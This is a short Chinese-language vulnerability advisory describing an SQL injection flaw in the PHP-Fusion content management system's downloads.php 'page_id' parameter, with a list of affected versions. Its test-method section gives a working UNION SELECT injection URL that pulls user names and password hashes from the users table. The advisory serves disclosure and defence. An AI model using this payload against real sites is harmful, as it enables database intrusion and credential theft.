漏洞起因
输入验证错误
影响系统
PHP-Fusion PHP-Fusion 6.1.15 4
PHP-Fusion PHP-Fusion 6.0.307
PHP-Fusion PHP-Fusion 6.0.204
PHP-Fusion PHP-Fusion 6.0.110
PHP-Fusion PHP-Fusion 6.0.109
PHP-Fusion PHP-Fusion 6.0.107
PHP-Fusion PHP-Fusion 6.0.105
PHP-Fusion PHP-Fusion 6.0 306
PHP-Fusion PHP-Fusion 6.0 304
PHP-Fusion PHP-Fusion 6.0 303
PHP-Fusion PHP-Fusion 6.01.10
不受影响系统
危害
远程攻击者可以利用漏洞进行SQL注入攻击,获得敏感信息。
攻击所需条件
攻击者必须访问PHP-Fusion。
漏洞信息
PHP-Fusion是一款流行的开源内容管理系统。
PHP-Fusion存在输入验证错误,远程攻击者可以利用漏洞进行SQL注入攻击,获得敏感信息。
‘downloads.php’脚本不正确过滤用户提交给’page_id’的参数,构建恶意SQL查询作为参数数据,可导致更改原来的SQL逻辑,攻击者借此可获得敏感信息或操作数据库。
测试方法
http://www.example.com/downloads.php?page_id=-1%27+union+select+1,2,user_name,4,user_password,6,7,8,9,10,11,12,13,14,15,16,17+from+rusfusion_users+limit+0,1/*
厂商解决方案
目前没有详细解决方案提供:
http://www.php-fusion.co.uk/
漏洞提供者
Inj3ct0r
0 条评论。